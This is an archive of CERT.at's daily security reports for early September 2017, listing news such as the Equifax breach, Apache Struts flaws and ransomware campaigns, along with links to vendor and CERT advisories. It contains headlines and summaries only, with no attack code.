- Daily - CERT.at

Tageszusammenfassung - 08.09.2017
by Daily end-of-shift report 08 Sep '17

08 Sep '17

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 07-09-2017 18:00 − Freitag 08-09-2017 18:00 Handler: Olaf Schwarz Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Daten von 143 Millionen US-Amerikanern entwendet ∗∗∗ --------------------------------------------- Bei einem Cyberangriff auf den US-Finanzdienstleister Equifax wurden äußerst sensible Daten von Millionen Amerikanern erbeutet, die nun Betrug im großen Stil ermöglichen. --------------------------------------------- https://futurezone.at/digital-life/daten-von-143-millionen-us-amerikanern-e… ∗∗∗ Android Toast Overlay Attack: “Cloak and Dagger” with No Permissions ∗∗∗ --------------------------------------------- Palo Alto Networks Unit 42 researchers have uncovered a high severity vulnerability in the Android overlay system, which allows a new Android overlay attack by using the “Toast type” overlay.The post Android Toast Overlay Attack: “Cloak and Dagger” with No Permissions appeared first on Palo Alto Networks Blog. --------------------------------------------- https://researchcenter.paloaltonetworks.com/2017/09/unit42-android-toast-ov… ∗∗∗ YASRV (Yet Another Struts RCE Vulnerability) yes a different one from yesterday ∗∗∗ --------------------------------------------- Yesterday saw CVE-2017-9805, today we have a new remote code execution vulnerability in Apache Struts 2 which is CVE-2017-12611. Yesterdays was in the REST API and related to Java XML unsafe deserializarion. Todays relates to using Freemarker in your application. Both should encourage you to patch. --------------------------------------------- https://isc.sans.edu/diary/rss/22796 ∗∗∗ Secure microkernel in a KVM switch offers spy-grade app virtualization ∗∗∗ --------------------------------------------- Need a few air-gapped apps on one screen? Heres how Researchers at Australian think tank Data61 and the nations Defence Science and Technology Group have cooked up application publishing for the paranoid, by baking an ARM CPU and secure microkernel into a KVM switch. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2017/09/07/cross_domai… ∗∗∗ TLS-Zertifikate: CAAs sollen Zertifizierungsstellen an die Leine legen ∗∗∗ --------------------------------------------- Admins können mit einer Certification Authority Authorization im DNS festlegen, wer Zertifikate für ihre Domain unterschreiben darf. Ab dem 8. September sind diese Vorgaben für Zertifizierungsstellen verbindlich. --------------------------------------------- https://heise.de/-3822010 ∗∗∗ Sechs Lücken in Android-Bootloadern bekannter Hersteller entdeckt ∗∗∗ --------------------------------------------- Die automatisierte Analyse des Codes zweier Android-Bootloader förderte insgesamt sechs Schwachstellen zutage. Denial-of-Service und Zugriff auf sensible Daten sind mögliche Folgen – allerdings nur dann, wenn der Angreifer bereits Root-Rechte hat. --------------------------------------------- https://heise.de/-3824289 ∗∗∗ Schwachstelle in Typo3-Repository als mögliches Schlupfloch für trojanisierte Erweiterungen ∗∗∗ --------------------------------------------- Aufgrund eines Fehlers hätten Dritte unter Umständen mit beliebigem Passwort auf das Typo3 Extension Repository zugreifen können. Nun warnen die Entwickler vor möglichen Erweiterungen mit Schadcode. --------------------------------------------- https://heise.de/-3825378 ∗∗∗ Keine Kartenaktivierung bei card complete erforderlich ∗∗∗ --------------------------------------------- Kriminelle versenden eine gefälschte card complete-Nachricht. Darin heißt es, dass die Kreditkarte von Kund/innen gesperrt worden sei. Für eine Reaktivierung sollen diese persönliche Daten bekannt geben. Wer der Aufforderung nachkommt, sendet Betrüger/innen seine Kreditkarteninformationen. --------------------------------------------- https://www.watchlist-internet.at/phishing/keine-kartenaktivierung-bei-card… ===================== = Advisories = ===================== ∗∗∗ Multiple Vulnerabilities in Apache Struts 2 Affecting Cisco Products: September 2017 ∗∗∗ --------------------------------------------- On September 5, 2017, the Apache Software Foundation released security bulletins that disclose three vulnerabilities in the Apache Struts 2 package. Of these vulnerabilities, the Apache Software Foundation classifies one as Critical Severity, one as Medium Severity, and one as Low Severity. For more information about the vulnerabilities, refer to the Details section of this advisory.Multiple Cisco products incorporate a version of the Apache Struts 2 package that is affected ... --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Smiths Medical Medfusion 4000 Wireless Syringe Infusion Pump Vulnerabilities ∗∗∗ --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSMA-17-250-02 ∗∗∗ SpiderControl SCADA Web Server ∗∗∗ --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-17-250-01 ∗∗∗ PHOENIX CONTACT, Innominate Security Technologies mGuard Firmware ∗∗∗ --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-17-250-02 ∗∗∗ i-SENS Inc. SmartLog Diabetes Management Software ∗∗∗ --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSMA-17-250-01 ∗∗∗ DFN-CERT-2017-1587/">GDK-PixBuf: Mehrere Schwachstellen ermöglichen u.a. das Ausführen beliebigen Programmcodes ∗∗∗ --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2017-1587/ ∗∗∗ Security Advisory - MITM Vulnerability in Huawei Themes App in Some Mobile Phones ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2017/huawei-sa-20170908-… ∗∗∗ IBM Security Bulletin: Vulnerability in IBM® Java SDK affects multiple IBM Rational products based on IBM Jazz technology ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22007909 ∗∗∗ IBM Security Bulletin: Open Source XStream as used in IBM QRadar SIEM is vulnerable to Denial of Service. (CVE-2017-7957) ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22008217 ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Content Classification ∗∗∗ --------------------------------------------- https://www-01.ibm.com/support/docview.wss?uid=swg22005380 ∗∗∗ IBM Security Bulletin: IBM Java SDK as used in IBM QRadar SIEM is vulnerable to multiple CVE’s. ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22008210 ∗∗∗ IBM Security Bulletin: IBM QRadar SIEM is vulnerable to information exposure. (CVE-2017-1162) ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22008194 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 07.09.2017
by Daily end-of-shift report 07 Sep '17

07 Sep '17

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 06-09-2017 18:00 − Donnerstag 07-09-2017 18:00 Handler: Stefan Lenzhofer Co-Handler: n/a ===================== = News = ===================== ∗∗∗ BlackBerry powered by Android Security Bulletin – September 2017 ∗∗∗ --------------------------------------------- http://support.blackberry.com/kb/articleDetail?language=en_US&articleNumber… ∗∗∗ Ransomware: What you need to know now | Salted Hash Ep 1, Pt 4 ∗∗∗ --------------------------------------------- Reporters Fahmida Rashid and Steve Ragan talk about the latest ransomware threats, the holes in IT security and the burdens on enterprises. --------------------------------------------- https://www.csoonline.com/video/81516/ransomware-what-you-need-to-know-now-… ∗∗∗ Microsoft Programming Error is Behind Dangerous Kernel Bug, Researchers Claim ∗∗∗ --------------------------------------------- Researchers say a 18-year-old programming error by Microsoft is creating a kernel bug that can be abused by an attacker. --------------------------------------------- http://threatpost.com/microsoft-programming-error-is-behind-dangerous-kerne… ∗∗∗ Interesting List of Windows Processes Killed by Malicious Software ∗∗∗ --------------------------------------------- Just a quick blog post about an interesting sample that I found today. Usually, modern pieces of malware implement anti-debugging and anti-VM techniques. They perform some checks against the target and when a positive result is found, they silently exit… Such checks might be testing the screen resolution, the activity[The post Interesting List of Windows Processes Killed by Malicious Software has been first published on /dev/random] --------------------------------------------- https://blog.rootshell.be/2017/09/06/interesting-list-windows-processes-kil… ∗∗∗ Apache Struts “serialisation” vulnerability – what you need to know ∗∗∗ --------------------------------------------- A bug in Apache Struts, a popular software toolkit for building web services, could let crooks take control of your server. --------------------------------------------- https://nakedsecurity.sophos.com/2017/09/06/apache-struts-serialisation-vul… ∗∗∗ Hackers Are Distributing Backdoored Cobian RAT Hacking tool For Free ∗∗∗ --------------------------------------------- Nothing is free in this world. If you are searching for free ready-made hacking tools on the Internet, then beware—most freely available tools, claiming to be the swiss army knife for hackers, are nothing but a hoax. Last year, we reported about one such Facebook hacking tool that actually had the capability to hack a Facebook account, but yours and not the one you desire to hack. --------------------------------------------- https://thehackernews.com/2017/09/backdoored-hacking-tools.html ∗∗∗ Expired domain names and malvertising - Malwarebytes Labs ∗∗∗ --------------------------------------------- https://blog.malwarebytes.com/threat-analysis/2017/09/expired-domain-names-… ∗∗∗ Gefälschte Microsoft-Warnung führt zu Datendiebstahl ∗∗∗ --------------------------------------------- Kriminelle fälschen einen Microsoft-Warnhinweis. Darin behaupten sie, dass fremde Computer mit Schadsoftware befallen seien. Vermeintliche Opfer sollen sich deshalb an eine Kundenhotline wenden. In Wahrheit gelangen sie an Verbrecher/innen, die Zugang zum Computer fordern, Dateien kopieren und Zahlungsdaten stehlen. --------------------------------------------- https://www.watchlist-internet.at/sonstiges/gefaelschte-microsoft-warnung-f… ===================== = Advisories = ===================== ∗∗∗ DFN-CERT-2017-1567/">IBM Notes: Zwei Schwachstellen ermöglichen Denial-of-Service-Angriffe ∗∗∗ --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2017-1567/ ∗∗∗ DFN-CERT-2017-1571/">Cisco ASR 5500 Series Routers: Eine Schwachstelle ermöglicht einen Denial-of-Service-Angriff ∗∗∗ --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2017-1571/ ∗∗∗ DFN-CERT-2017-1574/">Cisco Prime Collaboration Provisioning Tool: Zwei Schwachstellen ermöglichen das Ausspähen von Informationen und die Manipulation beliebiger Systemdateien ∗∗∗ --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2017-1574/ ∗∗∗ DFN-CERT-2017-1578/">Cisco ASR 920 Series Router: Zwei Schwachstellen ermöglichen die Ausführung beliebigen Programmcodes und die Manipulation von Dateien ∗∗∗ --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2017-1578/ ∗∗∗ DFN-CERT-2017-1579/">Cisco IOS, Cisco IOS XE: Zwei Schwachstellen ermöglichen verschiedene Denial-of-Service-Angriffe ∗∗∗ --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2017-1579/ ∗∗∗ DFN-CERT-2017-1580/">Cisco IR800 Integrated Services Router: Eine Schwachstelle ermöglicht die komplette Kompromittierung des Systems ∗∗∗ --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2017-1580/ ∗∗∗ Cisco Prime LAN Management Solution Token ID Reuse Lets Remote Authenticated Users Hijack the Target Users Session ∗∗∗ --------------------------------------------- http://www.securitytracker.com/id/1039285 ∗∗∗ Cisco Catalyst 4000 Series Switch Dynamic ACL Bug Lets Remote Users Bypass Port Access Controls on the Target System ∗∗∗ --------------------------------------------- http://www.securitytracker.com/id/1039284 ∗∗∗ TYPO3 API Bug Lets Remote Users Obtain Potentially Sensitive Version Information on the Target System ∗∗∗ --------------------------------------------- http://www.securitytracker.com/id/1039294 ∗∗∗ TYPO3 File Storage Access Control Flaw Lets Remote Authenticated Users Obtain Potentially Sensitive Information ∗∗∗ --------------------------------------------- http://www.securitytracker.com/id/1039293 ∗∗∗ TYPO3 Input Validation Flaw in Backend Forms Lets Remote Users Conduct Cross-Site Scripting Attacks ∗∗∗ --------------------------------------------- http://www.securitytracker.com/id/1039292 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 06.09.2017
by Daily end-of-shift report 06 Sep '17

06 Sep '17

===================== = End-of-Day report = ===================== Timeframe: Dienstag 05-09-2017 18:00 − Mittwoch 06-09-2017 18:00 Handler: Stefan Lenzhofer Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Hackers Gain ‘Switch-Flipping’ Access to US Power Systems ∗∗∗ --------------------------------------------- Hackers who hit American utilities this summer had the power to cause blackouts, Symantec says. --------------------------------------------- https://www.wired.com/story/hackers-gain-switch-flipping-access-to-us-power… see also: http://derstandard.at/2000063697965 see also: https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targ… see also: https://www.bleepingcomputer.com/news/security/sabotage-warning-issued-on-h… ∗∗∗ SynAck Ransomware Sees Huge Spike in Activity ∗∗∗ --------------------------------------------- Over the past two days, there was an increase in activity from a relatively unknown ransomware strain named SynAck, according to submissions to the ID-Ransomware service and users who complained on the Bleeping Computer ransomware support forums. [...] --------------------------------------------- https://www.bleepingcomputer.com/news/security/synack-ransomware-sees-huge-… ∗∗∗ Stop blaming users for security misses ∗∗∗ --------------------------------------------- Does the message to users about security need to change? Or does IT need to rebuild infrastructure so users can worry less about security? Wendy Nather, principal security strategist at Duo Security, talks with CSO senior writer Fahmida Rashid about how organizations can learn to do security right. --------------------------------------------- https://www.csoonline.com/video/80055/stop-blaming-users-for-security-misse… ∗∗∗ Security and education in the wake of WannaCry, Petya ∗∗∗ --------------------------------------------- Attacks occur for a variety of reasons, and in the wake of the most widespread ransomware attacks, WannaCry and Petya, many organizations are re-evaluating their security practices to figure out what went wrong.While those who were hit are still trying to understand where their security gaps are, others enterprises that rely on legacy systems and cant be patched are looking for ways to prevent being the next victim. No, the vulnerabilities attackers leverage are not new. They prey on systems --------------------------------------------- https://www.csoonline.com/article/3208384/backup-recovery/security-and-educ… ∗∗∗ The 15 biggest data breaches of the 21st centuryy ∗∗∗ --------------------------------------------- Data breaches happen daily, in too many places at once to keep count, take todays news of another Verizon breach that exposed the personal data of 6 million customers and a somewhat less dire breach at 14 Trump hotels. But what constitutes a huge breach versus a small one? CSO compiled a list of 15 of the biggest or most significant breaches of the 21st century.This list is based not necessarily on the number of records compromised, but on how much risk or damage the breach caused for --------------------------------------------- https://www.csoonline.com/article/2130877/data-protection/the-15-biggest-da… ∗∗∗ ShadowBrokers are back demanding nearly $4m and offering 2 dumps per month ∗∗∗ --------------------------------------------- The dreaded hacking group ShadowBrokers posted a new message, promising to deliver two data dumps a month as part its monthly dumps. The notorious group ShadowBrokers is back with announcing new interesting changes to their Dump Service. The hackers published a new message on the Steemit platform announcing new changed to their service. “Missing theshadowbrokers? If someone […]The post ShadowBrokers are back demanding nearly $4m and offering 2 dumps per month appeared first on --------------------------------------------- http://securityaffairs.co/wordpress/62770/hacking/shadowbrokers-return.html ∗∗∗ A Critical Apache Struts Security Flaw Makes It Easy To Hack Fortune 100 Firms ∗∗∗ --------------------------------------------- An anonymous reader quotes a report from ZDNet: A critical security vulnerability in open-source server software enables hackers to easily take control of an affected server -- putting sensitive corporate data at risk. The vulnerability allows an attacker to remotely run code on servers that run applications using the REST plugin, built with Apache Struts, according to security researchers who discovered the vulnerability. All versions of Struts since 2008 are affected, said the researchers. --------------------------------------------- https://apache.slashdot.org/story/17/09/05/2053200/a-critical-apache-struts… ∗∗∗ Hacker-Angriffe auf MongoDB treffen fast 27.000 Datenbanken ∗∗∗ --------------------------------------------- Erpresserische Angriffe auf sicherheitsanfällige MongoDB-Datenbanken liegen bei Online-Kriminellen bereits seit Ende letzten Jahres im Trend. Nun geht die Abzocke weiter: Drei neue Hackergruppen fordern Bitcoins im Tausch gegen Datenbankinhalte. --------------------------------------------- https://heise.de/-3822955 ∗∗∗ Security flaw affects 750,000 Estonian ID cards ∗∗∗ --------------------------------------------- An international group of cryptographers has flagged a serious security vulnerability in the chip embedded in Estonian ID cards, the country’s Information System Authority has announced. “Estonian experts assess there to be a possible security vulnerability and we will continue to verify the claims of the researchers,” said Taimar Peterkop, Director-General of the agency. “We have developed the primary solutions to mitigate the risk, and will do our utmost to ensure that --------------------------------------------- https://www.helpnetsecurity.com/2017/09/06/estonian-id-cards-security-flaw/ ===================== = Advisories = ===================== ∗∗∗ Apache Struts: Jetzt updaten und kritische Lücke schließen ∗∗∗ --------------------------------------------- Eine soeben veröffentlichte Version von Apache Struts schließt eine kritische Lücke. Die Entwickler und der Entdecker der Sicherheitslücke rechnen damit, dass diese bald für Angriffe auf Firmen missbraucht wird. Also ist jetzt zügiges Handeln angesagt. --------------------------------------------- https://heise.de/-3822948 ∗∗∗ Bugtraq: [security bulletin] HPESBUX03772 rev.1 - HP-UX BIND Service Running Named, Multiple Vulnerabilities ∗∗∗ --------------------------------------------- http://www.securityfocus.com/archive/1/541129 ∗∗∗ DFN-CERT-2017-1558/">Red Hat JBoss Enterprise Application Platform: Mehrere Schwachstellen ermöglichen u.a. die Ausführung beliebigen Programmcodes ∗∗∗ --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2017-1558/ ∗∗∗ DFN-CERT-2017-1556/">Google Android Operating System: Mehrere Schwachstellen ermöglichen u.a. die Ausführung beliebigen Programmcodes ∗∗∗ --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2017-1556/ ∗∗∗ DFN-CERT-2017-1563/">Google Chrome, Chromium: Mehrere Schwachstellen ermöglichen u.a. das Ausführen beliebigen Programmcodes ∗∗∗ --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2017-1563/ ∗∗∗ DFN-CERT-2017-1561/">IBM AIX, IBM VIOS, IBM Java SDK: Mehrere Schwachstellen ermöglichen u.a. die komplette Kompromittierung des Systems ∗∗∗ --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2017-1561/ ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Content Classification ∗∗∗ --------------------------------------------- https://www-01.ibm.com/support/docview.wss?uid=swg22008080 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 05.09.2017
by Daily end-of-shift report 05 Sep '17

05 Sep '17

===================== = End-of-Day report = ===================== Timeframe: Montag 04-09-2017 18:00 − Dienstag 05-09-2017 18:00 Handler: Olaf Schwarz Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Six-Year-Old "Loop Bug" Re-Discovered to Affect Almost All Major PDF Viewers ∗∗∗ --------------------------------------------- A bug discovered in an obscure PDF parsing library back in 2011 is also present in most of todays top PDF viewers, according to German software developer Hanno Böck. --------------------------------------------- https://www.bleepingcomputer.com/news/software/six-year-old-loop-bug-re-dis… ∗∗∗ TrustZone Downgrade Attack Opens Android Devices to Old Vulnerabilities ∗∗∗ --------------------------------------------- An attacker can downgrade components of the Android TrustZone technology to older versions that feature known vulnerabilities and use older exploits against smartphones running an up-to-date operating system. --------------------------------------------- https://www.bleepingcomputer.com/news/security/trustzone-downgrade-attack-o… ∗∗∗ The Mirai Botnet: A Look Back and Ahead At Whats Next, (Tue, Sep 5th) ∗∗∗ --------------------------------------------- It is a bit hard to nail down when the Mirai botnet really started. I usually use scans for port:2323 and the use of the password "xc3511" as an indicator. But of course, that isn't perfect. The very first scan using the password "xc3511" was detected by our sensor on February 26th, 2016, well ahead of Mirai. --------------------------------------------- https://isc.sans.edu/diary/rss/22786 ∗∗∗ Hunting Pastebin with PasteHunter ∗∗∗ --------------------------------------------- >From a security analytics and Threat Intelligence perspective Pastebin is a treasure trove of information. All content that is uploaded to pastebin and not explicitly set to private (which requires an account) is listed and can be viewed by anyone. --------------------------------------------- https://techanarchy.net/2017/09/hunting-pastebin-with-pastehunter/ ∗∗∗ Finger weg von SHA-1: 320 Millionen Passwörter geknackt ∗∗∗ --------------------------------------------- Wenn Webseitenbetreiber Passwörter von Kunden nicht sicher verwahren, ist der Super-GAU vorprogrammiert. Daran erinnern abermals Sicherheitsforscher, die in überschaubarer Zeit Millionen Passwörter entschlüsselt haben. --------------------------------------------- https://heise.de/-3822005 ===================== = Advisories = ===================== ∗∗∗ DFN-CERT-2017-1547/">Liblouis: Mehrere Schwachstellen ermöglichen u.a. das Ausführen beliebigen Programmcodes ∗∗∗ --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2017-1547/ ∗∗∗ DFN-CERT-2017-1554/">Apache Software Foundation Struts: Mehrere Schwachstellen ermöglichen das Ausführen beliebigen Programmcodes ∗∗∗ --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2017-1554/ ∗∗∗ Security Notice - Statement About the Bootloader Vulnerabilities in Huawei Mobile Phones Disclosed at the USENIX Conference ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-notices/2017/huawei-sn-20170905-01-… ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM SDK, Java Technology Edition Quarterly CPU – Jan 2017 – Includes Oracle Jan 2017 CPU affect IBM Content Classification ∗∗∗ --------------------------------------------- https://www-01.ibm.com/support/docview.wss?uid=swg22001461 ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Content Classification ∗∗∗ --------------------------------------------- https://www-01.ibm.com/support/docview.wss?uid=swg21996956 ∗∗∗ Arbitrary Code Execution in TYPO3 CMS ∗∗∗ --------------------------------------------- https://typo3.org/news/article/arbitrary-code-execution-in-typo3-cms/ ∗∗∗ Information Disclosure in TYPO3 CMS ∗∗∗ --------------------------------------------- https://typo3.org/news/article/information-disclosure-in-typo3-cms-1/ ∗∗∗ Information Disclosure in TYPO3 CMS ∗∗∗ --------------------------------------------- https://typo3.org/news/article/information-disclosure-in-typo3-cms/ ∗∗∗ Cross-Site Scripting in TYPO3 CMS Backend ∗∗∗ --------------------------------------------- https://typo3.org/news/article/cross-site-scripting-in-typo3-cms-backend/ ∗∗∗ USN-3409-1: FontForge vulnerabilities ∗∗∗ --------------------------------------------- http://www.ubuntu.com/usn/usn-3409-1/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 04.09.2017
by Daily end-of-shift report 04 Sep '17

04 Sep '17

===================== = End-of-Day report = ===================== Timeframe: Freitag 01-09-2017 18:00 − Montag 04-09-2017 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ RTP Bleed: Mit Asterisk-Bug Telefonate belauschen ∗∗∗ --------------------------------------------- Ein Bug in der IP-Telefonielösung Asterisk ermöglicht Angreifern, Telefonate mitzuhören. Das Problem liegt in der zugrundeliegenden RTP-Implementierung. Ein erster Patch ist da, aber noch fehlerhaft. --------------------------------------------- https://www.golem.de/news/rtp-bleed-mit-asterisk-bug-telefonate-belauschen-… ∗∗∗ Malspam pushing Locky ransomware tries HoeflerText notifications for Chrome and FireFox ∗∗∗ --------------------------------------------- 2017-09-01 update: A different campaign using HoeflerText popups has been active during the same timeframe. I wrote about it here, but the only thing these two campaigns have in common is that they both used HoeflerText popups. --------------------------------------------- https://isc.sans.edu/forums/diary/Malspam+pushing+Locky+ransomware+tries+Ho… ∗∗∗ Fehler in API: Möglicherweise Millionen Kontaktdaten von Instagram-Usern öffentlich ∗∗∗ --------------------------------------------- Wegen eines Bug in der Kommunikationsschnittstelle zu anderen Apps müssen Millionen Instagram-Nutzer um ihre Privatsphäre fürchten. Betroffen sind laut der Facebook-Tochter nicht nur Prominente. --------------------------------------------- https://heise.de/-3820497 ∗∗∗ Mehrere Sicherheitslücken in RubyGems ∗∗∗ --------------------------------------------- Rubys Paketsystem RubyGems enthält Schwachstellen, die unter anderem DoS-Angriffe und DNS-Hijacking ermöglichen. Ein Update auf die aktuelle Version 2.6.13 bannt die Gefahr. --------------------------------------------- https://heise.de/-3820891 ∗∗∗ Mehrere große Torrent-Seiten offenbar nach Attacken offline ∗∗∗ --------------------------------------------- Eine Reihe prominenter Plattformen wie Torrentproject sind nicht mehr erreichbar – Domains suspendiert, Überlastungsangriffe --------------------------------------------- http://derstandard.at/2000063553913 ===================== = Advisories = ===================== ∗∗∗ DSA-3960 gnupg - security update ∗∗∗ --------------------------------------------- Daniel J. Bernstein, Joachim Breitner, Daniel Genkin, Leon GrootBruinderink, Nadia Heninger, Tanja Lange, Christine van Vredendaal and Yuval Yarom discovered that GnuPG is prone to a local side-channel attack allowing full key recovery for RSA-1024. --------------------------------------------- https://www.debian.org/security/2017/dsa-3960 ∗∗∗ DSA-3961 libgd2 - security update ∗∗∗ --------------------------------------------- A double-free vulnerability was discovered in the gdImagePngPtr()function in libgd2, a library for programmatic graphics creation and manipulation, which may result in denial of service or potentially the execution of arbitrary code if a specially crafted file is processed. --------------------------------------------- https://www.debian.org/security/2017/dsa-3961 ∗∗∗ DSA-3962 strongswan - security update ∗∗∗ --------------------------------------------- A denial of service vulnerability was identified in strongSwan, an IKE/IPsecsuite, using Googles OSS-Fuzz fuzzing project. --------------------------------------------- https://www.debian.org/security/2017/dsa-3962 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 01.09.2017
by Daily end-of-shift report 01 Sep '17

01 Sep '17

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 31-08-2017 18:00 − Freitag 01-09-2017 18:00 Handler: Olaf Schwarz Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Boobytrapped Word File Installs Locky Ransomware When You Close the Document ∗∗∗ --------------------------------------------- Summer vacation is over! During the past week, security researchers have discovered several distribution campaigns pushing the Locky ransomware via different methods, including a new variant that features one hell of a clever trick. --------------------------------------------- https://www.bleepingcomputer.com/news/security/boobytrapped-word-file-insta… ∗∗∗ US Government Site Was Hosting Ransomware ∗∗∗ --------------------------------------------- As recently as Wednesday afternoon, a U.S. government website was hosting a malicious JavaScript downloader that led victims to installations of Cerber ransomware. The malware link has since been taken down. --------------------------------------------- http://threatpost.com/us-government-site-removes-link-to-cerber-ransomware-… ∗∗∗ Malware writer offers free trojan to hackers ... with one small drawback ∗∗∗ --------------------------------------------- Beware of geeks bearing Cobian RAT gifts Those looking on the dark web for malware capable of hijacking computers might have thought they were getting a bargain when a free trojan appeared on various online souks over the past few months. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2017/08/31/free_trojan… ∗∗∗ Lücke in HPE Operations Orchestration ermöglicht Remote Code Execution ∗∗∗ --------------------------------------------- Die Software Operations Orchestration erlaubt in allen Versionen vor 10.80 die Codeausführung aus der Ferne. Hewlett Packard Enterprise rät zum Update. Auch für zwei Performancetest-Tools des Herstellers stehen Aktualisierungen bereit. --------------------------------------------- https://heise.de/-3819782 ===================== = Advisories = ===================== ∗∗∗ OPW Fuel Management Systems SiteSentinel Integra and SiteSentinel iSite ∗∗∗ --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-17-243-04 ∗∗∗ Moxa SoftCMS Live Viewer ∗∗∗ --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-17-243-05 ∗∗∗ Automated Logic Corporation ALC WebCTRL, Liebert SiteScan, Carrier i-VU ∗∗∗ --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-17-150-01 ∗∗∗ DFN-CERT-2017-1542/">Digium Asterisk, Digium Certified Asterisk: Mehrere Schwachstellen ermöglichen u.a. das Ausführen beliebigen Programmcodes ∗∗∗ --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2017-1542/ ∗∗∗ SSA-866217: SMBv1 Vulnerabilities in ACUSON S1000/2000/3000 ∗∗∗ --------------------------------------------- https://www.siemens.com/cert/pool/cert/siemens_security_advisory_ssa-866217… ∗∗∗ Security Advisory - FRP Bypass Vulnerability in Huawei Honor 5S Smart Phones ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2017/huawei-sa-20170901-… ∗∗∗ Security Advisory - Privilege Escalation Vulnerability in Some Huawei APKs ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2017/huawei-sa-20170901-… ∗∗∗ IBM Security Bulletin: IBM Expeditor is affected by a denial of service vulnerability ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22002103 ∗∗∗ IBM Security Bulletin: IBM Notes is affected by a denial of service vulnerability ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg21999385 ∗∗∗ IBM Security Bulletin: IBM Notes is affected by a denial of service vulnerability ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg21999384 ∗∗∗ IBM Security Bulletin: IBM Notes is affected by Open Source zlib vulnerabilities ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg21997877 ∗∗∗ IBM Security Bulletin: IBM QRadar Network Security is affected by a vulnerability in Curl (CVE-2016-7167) ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22007553 ∗∗∗ IBM Security Bulletin: IBM QRadar Network Security is affected by vulnerabilities in bash (CVE-2016-9401, CVE-2016-7543, CVE-2016-0634) ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22007554 ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Development Package for Apache Spark ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22007416 ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Security Network Protection ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22007918 ∗∗∗ IBM Security Bulletin: IBM QRadar Network Security is affected by vulnerabilities in Linux kernel ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22007552 ∗∗∗ IBM Security Bulletin: IBM QRadar Network Security is affected by potential issues of XML External Entity Injection (CVE-2017-1458) ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22007551 ∗∗∗ IBM Security Bulletin: IBM QRadar Network Security is affected by potential issues of Cross-Site Scripting (CVE-2017-1457) ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22007550 ∗∗∗ IBM Security Bulletin: IBM QRadar Network Security has updated commons-fileupload for known vulnerabilities (CVE-2016-3092) ∗∗∗ --------------------------------------------- 